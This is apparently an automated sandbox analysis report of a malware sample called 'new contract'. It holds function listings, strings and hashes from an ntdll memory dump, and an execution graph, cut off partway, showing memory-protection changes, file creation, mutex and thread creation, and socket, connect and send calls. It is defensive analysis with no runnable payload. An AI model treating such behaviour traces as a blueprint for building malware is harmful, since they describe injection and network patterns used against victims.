                                                                                                                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01694787
                                                                                                                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01694742
                                                                                                                                                                            • Execute=1, xrefs: 01694713
                                                                                                                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01694725
                                                                                                                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01694655
                                                                                                                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016946FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                            • API String ID: 0-484625025
                                                                                                                                                                            • Opcode ID: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                                                                                                                                            • Instruction ID: f3310e1e7e8f608aa82388ddabfb9bc1c68b09dff8a519509402f7998e2365d1
                                                                                                                                                                            • Opcode Fuzzy Hash: 81748505eede7396846bc77844bfd639d9d9dbc2a6e5a79c5f8176d04d01ddf4
                                                                                                                                                                            • Instruction Fuzzy Hash: 29510A31600219ABEF11ABA8EC95FBE77ADEF15300F44009DDA05A72C1EB71DE468F65
                                                                                                                                                                            Function 016F6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                            • Instruction ID: 5b06a4760e07902274279e7315a06d81189b615bc4b47b6dd06d35dc34a8fee0
                                                                                                                                                                            • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                                                                                            • Instruction Fuzzy Hash: E8021671508342AFD305CF18C894A6BBBE6FFC8704F04892DFA955B264DB31E905CB56
                                                                                                                                                                            Function 0166B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-$0$0
                                                                                                                                                                            • API String ID: 1302938615-699404926
                                                                                                                                                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction ID: 7e6c579203cbbf6e7dac689b0676e96cd63d7393096f6ad8fc0b519d328bd646
                                                                                                                                                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                            • Instruction Fuzzy Hash: EF81BC30B0525ADEEF258E68CC917BEBFAAAF45320F18411AD961E7391C73898418B65
                                                                                                                                                                            Function 016D20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$[$]:%u
                                                                                                                                                                            • API String ID: 48624451-2819853543
                                                                                                                                                                            • Opcode ID: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                                                                                                                                            • Instruction ID: 54bae808f98891ac4f5ffdb8972747ea4e9e2e1ef3f8917c43491ddd80d68484
                                                                                                                                                                            • Opcode Fuzzy Hash: ff9d13505efff531388e71bbd723e7cf8e02035a98879faaaac71cf3b2a04125
                                                                                                                                                                            • Instruction Fuzzy Hash: 5721517AE00119ABDB11DE79CC50ABEBBF9EF54651F08411EEA15E3200E730DA158BA1
                                                                                                                                                                            Function 0164F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 0169031E
                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016902BD
                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016902E7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                                                            • Opcode ID: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                                                                                                                                            • Instruction ID: 581de54478d748f720d2ed469482b438c5e15d146d55fea0951cd7f1c0f84111
                                                                                                                                                                            • Opcode Fuzzy Hash: ede730f6b424ee3d23fcca0680c96f4c57798f388e9f61b0d04bffd2c63d18da
                                                                                                                                                                            • Instruction Fuzzy Hash: 1EE1AC706087429FEB25CF2CCC84B2ABBE9AB85324F144A9DF5A58B3D1D774D845CB42
                                                                                                                                                                            Function 0165BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01697B7F
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 01697BAC
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 01697B8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 0-871070163
                                                                                                                                                                            • Opcode ID: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                                                                                                                                            • Instruction ID: 71dbad531b24956e28806ce13c88416cb21ad28005f482ecf0aee26d1a35915d
                                                                                                                                                                            • Opcode Fuzzy Hash: 37c71c85a01c7d2c353c794a44ee3679c150a21345beea95a48fbf0f03b8f4c7
                                                                                                                                                                            • Instruction Fuzzy Hash: BD41E2317007029FDB25CE2DDC40B6AB7EAEF98710F100A1DE95A9B380DB31E8058F95
                                                                                                                                                                            Function 0165B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0169728C
                                                                                                                                                                            Strings
                                                                                                                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01697294
                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 016972C1
                                                                                                                                                                            • RTL: Resource at %p, xrefs: 016972A3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                                            • API String ID: 885266447-605551621
                                                                                                                                                                            • Opcode ID: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                                                                                                                                            • Instruction ID: a58019a71875c8df013bb04d3e60e89a85a459002bde078bdf8113180cd98075
                                                                                                                                                                            • Opcode Fuzzy Hash: 54ab18484dc5572d79ebe932786b1ba062e5a24c07cb4bfbb56bc6ea30a41664
                                                                                                                                                                            • Instruction Fuzzy Hash: 7F41FF31611206ABCB21CE69CC81B6ABBAAFF94710F14465DFD55EB380DB20E8528BD5
                                                                                                                                                                            Function 016D2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                                            • String ID: %%%u$]:%u
                                                                                                                                                                            • API String ID: 48624451-3050659472
                                                                                                                                                                            • Opcode ID: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                                                                                                                                            • Instruction ID: a9ca8117f4434ac0ad5d50d9d1f46dd98f7ae43ef23e71c0bd84c65ea67bb70d
                                                                                                                                                                            • Opcode Fuzzy Hash: b3b59becaf48e5cac8cb5c4e0411b9b652b8c16af2df4b35077ad59d9c95e69d
                                                                                                                                                                            • Instruction Fuzzy Hash: DB318172A002199FDB20DF2DCC50BEEB7F9EB44610F45455EED49E3200EF30AA548BA0
                                                                                                                                                                            Function 01667D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __aulldvrm
                                                                                                                                                                            • String ID: +$-
                                                                                                                                                                            • API String ID: 1302938615-2137968064
                                                                                                                                                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                            • Instruction ID: 2d5b6f16d1d83535f5a6ab1ad42409fe2206da714652ac694a9376635612f62d
                                                                                                                                                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                                                            • Instruction Fuzzy Hash: 3891B271E0020A9BEB24DF6DCC80ABEBBBDAF84728F14451AE955E73C0D7349941CB51
                                                                                                                                                                            Function 01629126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1806931076.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_15f0000_new contract.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $$@
                                                                                                                                                                            • API String ID: 0-1194432280
                                                                                                                                                                            • Opcode ID: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                                                                                                                                            • Instruction ID: ae7f058f65aced2930810460b94554d605f0b177b4752f2d93c2770d633d53ea
                                                                                                                                                                            • Opcode Fuzzy Hash: 3211f14d5238881fe04c9304802790714eb01125b0116dcfdd12e549fe93c1a5
                                                                                                                                                                            • Instruction Fuzzy Hash: 4C812971D002799BDB31DB54CC54BEABBB8AF48714F1041EAEA19B7280D7709E85CFA4

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:2.3%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:4.7%
                                                                                                                                                                            Total number of Nodes:444
                                                                                                                                                                            Total number of Limit Nodes:16
                                                                                                                                                                            execution_graph 13758 e4e5a4d 13759 e4e5a53 13758->13759 13762 e4d9782 13759->13762 13761 e4e5a6b 13764 e4d978f 13762->13764 13763 e4d97ad 13763->13761 13764->13763 13766 e4de662 13764->13766 13767 e4de66b 13766->13767 13772 e4de7ba 13766->13772 13768 e4d80f2 6 API calls 13767->13768 13767->13772 13769 e4de6ee 13768->13769 13770 e4de750 13769->13770 13771 e4e3f82 6 API calls 13769->13771 13770->13772 13773 e4de83f 13770->13773 13774 e4de791 13770->13774 13771->13770 13772->13763 13773->13772 13775 e4e3f82 6 API calls 13773->13775 13774->13772 13776 e4e3f82 6 API calls 13774->13776 13775->13772 13776->13772 13777 e4e4e0a 13778 e4e3942 13777->13778 13779 e4e4e45 NtProtectVirtualMemory 13778->13779 13780 e4e4e70 13779->13780 13905 e4dd14a 13906 e4dd153 13905->13906 13907 e4dd174 13905->13907 13908 e4df382 ObtainUserAgentString 13906->13908 13909 e4dd1e7 13907->13909 13913 e4d81f2 13907->13913 13910 e4dd16c 13908->13910 13911 e4d80f2 6 API calls 13910->13911 13911->13907 13914 e4d820f 13913->13914 13918 e4d82c9 13913->13918 13915 e4e2f12 7 API calls 13914->13915 13917 e4d8242 13914->13917 13915->13917 13916 e4d8289 13916->13918 13919 e4d80f2 6 API calls 13916->13919 13917->13916 13920 e4d9432 NtCreateFile 13917->13920 13918->13907 13919->13918 13920->13916 13742 e4e3f82 13743 e4e3fb8 13742->13743 13744 e4e05b2 socket 13743->13744 13746 e4e4081 13743->13746 13753 e4e4022 13743->13753 13744->13746 13745 e4e4134 13747 e4e0732 connect 13745->13747 13751 e4e41b2 13745->13751 13745->13753 13746->13745 13748 e4e4117 getaddrinfo 13746->13748 13746->13753 13747->13751 13748->13745 13749 e4e06b2 send 13752 e4e4729 13749->13752 13750 e4e47f4 setsockopt recv 13750->13753 13751->13749 13751->13753 13752->13750 13752->13753 13495 e4d82dd 13499 e4d831a 13495->13499 13496 e4d83fa 13497 e4d8328 SleepEx 13497->13497 13497->13499 13499->13496 13499->13497 13502 e4e2f12 13499->13502 13511 e4d9432 13499->13511 13521 e4d80f2 13499->13521 13503 e4e2f48 13502->13503 13504 e4e3232 NtCreateFile 13503->13504 13505 e4e30e9 13503->13505 13510 e4e3134 13503->13510 13527 e4e3f82 13503->13527 13504->13503 13506 e4e3125 13505->13506 13539 e4e2842 13505->13539 13547 e4e2922 13506->13547 13510->13499 13512 e4d945b 13511->13512 13520 e4d94c9 13511->13520 13513 e4e3232 NtCreateFile 13512->13513 13512->13520 13514 e4d9496 13513->13514 13519 e4d94c5 13514->13519 13568 e4d9082 13514->13568 13515 e4e3232 NtCreateFile 13515->13520 13517 e4d94b6 13517->13519 13577 e4d8f52 13517->13577 13519->13515 13519->13520 13520->13499 13522 e4d81d3 13521->13522 13523 e4d8109 13521->13523 13522->13499 13582 e4d8012 13523->13582 13525 e4d8113 13525->13522 13526 e4e3f82 6 API calls 13525->13526 13526->13522 13528 e4e3fb8 13527->13528 13531 e4e4081 13528->13531 13538 e4e4022 13528->13538 13555 e4e05b2 13528->13555 13530 e4e4134 13536 e4e41b2 13530->13536 13530->13538 13558 e4e0732 13530->13558 13531->13530 13533 e4e4117 getaddrinfo 13531->13533 13531->13538 13533->13530 13535 e4e47f4 setsockopt recv 13535->13538 13536->13538 13561 e4e06b2 13536->13561 13537 e4e4729 13537->13535 13537->13538 13538->13503 13540 e4e286d 13539->13540 13564 e4e3232 13540->13564 13542 e4e2906 13542->13505 13543 e4e2888 13543->13542 13544 e4e3f82 6 API calls 13543->13544 13545 e4e28c5 13543->13545 13544->13545 13545->13542 13546 e4e3232 NtCreateFile 13545->13546 13546->13542 13548 e4e29c2 13547->13548 13549 e4e3232 NtCreateFile 13548->13549 13553 e4e29d6 13549->13553 13550 e4e2a9f 13550->13510 13551 e4e2a5d 13551->13550 13552 e4e3232 NtCreateFile 13551->13552 13552->13550 13553->13550 13553->13551 13554 e4e3f82 6 API calls 13553->13554 13554->13551 13556 e4e05ec 13555->13556 13557 e4e060a socket 13555->13557 13556->13557 13557->13531 13559 e4e076a 13558->13559 13560 e4e0788 connect 13558->13560 13559->13560 13560->13536 13562 e4e06e7 13561->13562 13563 e4e0705 send 13561->13563 13562->13563 13563->13537 13566 e4e325c 13564->13566 13567 e4e3334 13564->13567 13565 e4e3410 NtCreateFile 13565->13567 13566->13565 13566->13567 13567->13543 13569 e4d9420 13568->13569 13570 e4d90aa 13568->13570 13569->13517 13570->13569 13571 e4e3232 NtCreateFile 13570->13571 13572 e4d91f9 13571->13572 13573 e4e3232 NtCreateFile 13572->13573 13576 e4d93df 13572->13576 13574 e4d93c9 13573->13574 13575 e4e3232 NtCreateFile 13574->13575 13575->13576 13576->13517 13578 e4d8f70 13577->13578 13579 e4d8f84 13577->13579 13578->13519 13580 e4e3232 NtCreateFile 13579->13580 13581 e4d9046 13580->13581 13581->13519 13584 e4d8031 13582->13584 13583 e4d80cd 13583->13525 13584->13583 13585 e4e3f82 6 API calls 13584->13585 13585->13583 13813 e4dbedd 13815 e4dbf06 13813->13815 13814 e4dbfa4 13815->13814 13816 e4d88f2 NtProtectVirtualMemory 13815->13816 13817 e4dbf9c 13816->13817 13818 e4df382 ObtainUserAgentString 13817->13818 13818->13814 13781 e4e5a1f 13782 e4e5a25 13781->13782 13785 e4d95f2 13782->13785 13784 e4e5a3d 13786 e4d960e 13785->13786 13787 e4d95fb 13785->13787 13786->13784 13787->13786 13788 e4de662 6 API calls 13787->13788 13788->13786 13944 e4dbdd9 13945 e4dbdf0 13944->13945 13946 e4df382 ObtainUserAgentString 13945->13946 13947 e4dbecd 13945->13947 13946->13947 13819 e4ddcd4 13821 e4ddcd8 13819->13821 13820 e4de022 13821->13820 13825 e4dd352 13821->13825 13823 e4ddf0d 13823->13820 13834 e4dd792 13823->13834 13826 e4dd39e 13825->13826 13827 e4dd4ec 13826->13827 13829 e4dd595 13826->13829 13833 e4dd58e 13826->13833 13828 e4e3232 NtCreateFile 13827->13828 13831 e4dd4ff 13828->13831 13830 e4e3232 NtCreateFile 13829->13830 13829->13833 13830->13833 13832 e4e3232 NtCreateFile 13831->13832 13831->13833 13832->13833 13833->13823 13835 e4dd7e0 13834->13835 13836 e4e3232 NtCreateFile 13835->13836 13838 e4dd90c 13836->13838 13837 e4ddaf3 13837->13823 13838->13837 13839 e4dd352 NtCreateFile 13838->13839 13840 e4dd602 NtCreateFile 13838->13840 13839->13838 13840->13838 13734 e4e4e12 13735 e4e4e45 NtProtectVirtualMemory 13734->13735 13736 e4e3942 13734->13736 13737 e4e4e70 13735->13737 13736->13735 13789 e4d9613 13790 e4d9620 13789->13790 13791 e4d9684 13790->13791 13792 e4e4e12 NtProtectVirtualMemory 13790->13792 13792->13790 13941 e4e072e 13942 e4e0788 connect 13941->13942 13943 e4e076a 13941->13943 13943->13942 13586 e4e4bac 13587 e4e4bb1 13586->13587 13620 e4e4bb6 13587->13620 13621 e4dab72 13587->13621 13589 e4e4c2c 13590 e4e4c85 13589->13590 13592 e4e4c69 13589->13592 13593 e4e4c54 13589->13593 13589->13620 13591 e4e2ab2 NtProtectVirtualMemory 13590->13591 13596 e4e4c8d 13591->13596 13594 e4e4c6e 13592->13594 13595 e4e4c80 13592->13595 13597 e4e2ab2 NtProtectVirtualMemory 13593->13597 13598 e4e2ab2 NtProtectVirtualMemory 13594->13598 13595->13590 13599 e4e4c97 13595->13599 13657 e4dc102 13596->13657 13601 e4e4c5c 13597->13601 13602 e4e4c76 13598->13602 13603 e4e4cbe 13599->13603 13604 e4e4c9c 13599->13604 13643 e4dbee2 13601->13643 13649 e4dbfc2 13602->13649 13607 e4e4cd9 13603->13607 13608 e4e4cc7 13603->13608 13603->13620 13625 e4e2ab2 13604->13625 13611 e4e2ab2 NtProtectVirtualMemory 13607->13611 13607->13620 13610 e4e2ab2 NtProtectVirtualMemory 13608->13610 13613 e4e4ccf 13610->13613 13614 e4e4ce5 13611->13614 13667 e4dc2f2 13613->13667 13685 e4dc712 13614->13685 13623 e4dab93 13621->13623 13622 e4dacce 13622->13589 13623->13622 13624 e4dacb5 CreateMutexExW 13623->13624 13624->13622 13626 e4e2adf 13625->13626 13627 e4e2ebc 13626->13627 13697 e4d88f2 13626->13697 13635 e4dbde2 13627->13635 13629 e4e2e5c 13630 e4d88f2 NtProtectVirtualMemory 13629->13630 13631 e4e2e7c 13630->13631 13632 e4d88f2 NtProtectVirtualMemory 13631->13632 13633 e4e2e9c 13632->13633 13634 e4d88f2 NtProtectVirtualMemory 13633->13634 13634->13627 13637 e4dbdf0 13635->13637 13636 e4dbecd 13639 e4d8412 13636->13639 13637->13636 13722 e4df382 13637->13722 13641 e4d8440 13639->13641 13640 e4d8473 13640->13620 13641->13640 13642 e4d844d CreateThread 13641->13642 13642->13620 13645 e4dbf06 13643->13645 13644 e4dbfa4 13644->13620 13645->13644 13646 e4d88f2 NtProtectVirtualMemory 13645->13646 13647 e4dbf9c 13646->13647 13648 e4df382 ObtainUserAgentString 13647->13648 13648->13644 13652 e4dc016 13649->13652 13650 e4dc0f0 13650->13620 13651 e4dc0e8 13653 e4df382 ObtainUserAgentString 13651->13653 13652->13650 13654 e4d88f2 NtProtectVirtualMemory 13652->13654 13655 e4dc0bb 13652->13655 13653->13650 13654->13655 13655->13651 13656 e4d88f2 NtProtectVirtualMemory 13655->13656 13656->13651 13659 e4dc137 13657->13659 13658 e4dc2d5 13658->13620 13659->13658 13660 e4d88f2 NtProtectVirtualMemory 13659->13660 13661 e4dc28a 13660->13661 13662 e4d88f2 NtProtectVirtualMemory 13661->13662 13665 e4dc2a9 13662->13665 13663 e4dc2cd 13664 e4df382 ObtainUserAgentString 13663->13664 13664->13658 13665->13663 13666 e4d88f2 NtProtectVirtualMemory 13665->13666 13666->13663 13669 e4dc349 13667->13669 13668 e4dc4c3 13675 e4d88f2 NtProtectVirtualMemory 13668->13675 13676 e4dc597 13668->13676 13670 e4dc49f 13669->13670 13672 e4d88f2 NtProtectVirtualMemory 13669->13672 13670->13668 13671 e4d88f2 NtProtectVirtualMemory 13670->13671 13671->13668 13673 e4dc480 13672->13673 13674 e4d88f2 NtProtectVirtualMemory 13673->13674 13674->13670 13675->13676 13677 e4d88f2 NtProtectVirtualMemory 13676->13677 13679 e4dc5bf 13676->13679 13677->13679 13678 e4dc6e1 13680 e4df382 ObtainUserAgentString 13678->13680 13681 e4d88f2 NtProtectVirtualMemory 13679->13681 13682 e4dc6b9 13679->13682 13683 e4dc6e9 13680->13683 13681->13682 13682->13678 13684 e4d88f2 NtProtectVirtualMemory 13682->13684 13683->13620 13684->13678 13686 e4dc767 13685->13686 13687 e4d88f2 NtProtectVirtualMemory 13686->13687 13692 e4dc903 13686->13692 13688 e4dc8e3 13687->13688 13689 e4d88f2 NtProtectVirtualMemory 13688->13689 13689->13692 13690 e4dc9b7 13691 e4df382 ObtainUserAgentString 13690->13691 13694 e4dc9bf 13691->13694 13693 e4dc992 13692->13693 13695 e4d88f2 NtProtectVirtualMemory 13692->13695 13693->13690 13696 e4d88f2 NtProtectVirtualMemory 13693->13696 13694->13620 13695->13693 13696->13690 13698 e4d8987 13697->13698 13700 e4d89b2 13698->13700 13712 e4d9622 13698->13712 13701 e4d8ba2 13700->13701 13703 e4d8ac5 13700->13703 13705 e4d8c0c 13700->13705 13702 e4e4e12 NtProtectVirtualMemory 13701->13702 13711 e4d8b5b 13702->13711 13716 e4e4e12 13703->13716 13705->13629 13706 e4e4e12 NtProtectVirtualMemory 13706->13705 13707 e4d8ae3 13707->13705 13708 e4d8b3d 13707->13708 13709 e4e4e12 NtProtectVirtualMemory 13707->13709 13710 e4e4e12 NtProtectVirtualMemory 13708->13710 13709->13708 13710->13711 13711->13705 13711->13706 13713 e4d967a 13712->13713 13714 e4d9684 13713->13714 13715 e4e4e12 NtProtectVirtualMemory 13713->13715 13714->13700 13715->13713 13717 e4e4e45 NtProtectVirtualMemory 13716->13717 13720 e4e3942 13716->13720 13719 e4e4e70 13717->13719 13719->13707 13721 e4e3967 13720->13721 13721->13717 13723 e4df3c7 13722->13723 13726 e4df232 13723->13726 13725 e4df438 13725->13636 13727 e4df25e 13726->13727 13730 e4de8c2 13727->13730 13729 e4df26b 13729->13725 13731 e4de934 13730->13731 13732 e4de9a6 13731->13732 13733 e4de995 ObtainUserAgentString 13731->13733 13732->13729 13733->13732 13793 e4d942e 13794 e4d945b 13793->13794 13802 e4d94c9 13793->13802 13795 e4e3232 NtCreateFile 13794->13795 13794->13802 13796 e4d9496 13795->13796 13798 e4d9082 NtCreateFile 13796->13798 13801 e4d94c5 13796->13801 13797 e4e3232 NtCreateFile 13797->13802 13799 e4d94b6 13798->13799 13800 e4d8f52 NtCreateFile 13799->13800 13799->13801 13800->13801 13801->13797 13801->13802 13803 e4df22a 13804 e4df25e 13803->13804 13805 e4de8c2 ObtainUserAgentString 13804->13805 13806 e4df26b 13805->13806 13889 e4e5aa9 13890 e4e5aaf 13889->13890 13893 e4e0212 13890->13893 13892 e4e5ac7 13894 e4e021b 13893->13894 13895 e4e0237 13893->13895 13894->13895 13896 e4e00c2 6 API calls 13894->13896 13895->13892 13896->13895 13841 e4e02e4 13842 e4e036f 13841->13842 13843 e4e0305 13841->13843 13843->13842 13845 e4e00c2 13843->13845 13846 e4e01f0 13845->13846 13847 e4e00cb 13845->13847 13846->13842 13847->13846 13848 e4e3f82 6 API calls 13847->13848 13848->13846 13921 e4dab66 13922 e4dab6a 13921->13922 13923 e4dacb5 CreateMutexExW 13922->13923 13924 e4dacce 13922->13924 13923->13924 13849 e4ddce2 13850 e4dddd9 13849->13850 13851 e4de022 13850->13851 13852 e4dd352 NtCreateFile 13850->13852 13853 e4ddf0d 13852->13853 13853->13851 13854 e4dd792 NtCreateFile 13853->13854 13854->13853 13964 e4dbfbf 13967 e4dc016 13964->13967 13965 e4dc0f0 13966 e4dc0e8 13968 e4df382 ObtainUserAgentString 13966->13968 13967->13965 13969 e4d88f2 NtProtectVirtualMemory 13967->13969 13970 e4dc0bb 13967->13970 13968->13965 13969->13970 13970->13966 13971 e4d88f2 NtProtectVirtualMemory 13970->13971 13971->13966 13897 e4de8be 13898 e4de8c3 13897->13898 13899 e4de9a6 13898->13899 13900 e4de995 ObtainUserAgentString 13898->13900 13900->13899 13807 e4e283a 13808 e4e2841 13807->13808 13809 e4e3f82 6 API calls 13808->13809 13811 e4e28c5 13809->13811 13810 e4e2906 13811->13810 13812 e4e3232 NtCreateFile 13811->13812 13812->13810 13929 e4e3f7a 13930 e4e3fb8 13929->13930 13931 e4e05b2 socket 13930->13931 13933 e4e4081 13930->13933 13940 e4e4022 13930->13940 13931->13933 13932 e4e4134 13934 e4e0732 connect 13932->13934 13938 e4e41b2 13932->13938 13932->13940 13933->13932 13935 e4e4117 getaddrinfo 13933->13935 13933->13940 13934->13938 13935->13932 13936 e4e06b2 send 13939 e4e4729 13936->13939 13937 e4e47f4 setsockopt recv 13937->13940 13938->13936 13938->13940 13939->13937 13939->13940 13855 e4dc0fb 13857 e4dc137 13855->13857 13856 e4dc2d5 13857->13856 13858 e4d88f2 NtProtectVirtualMemory 13857->13858 13859 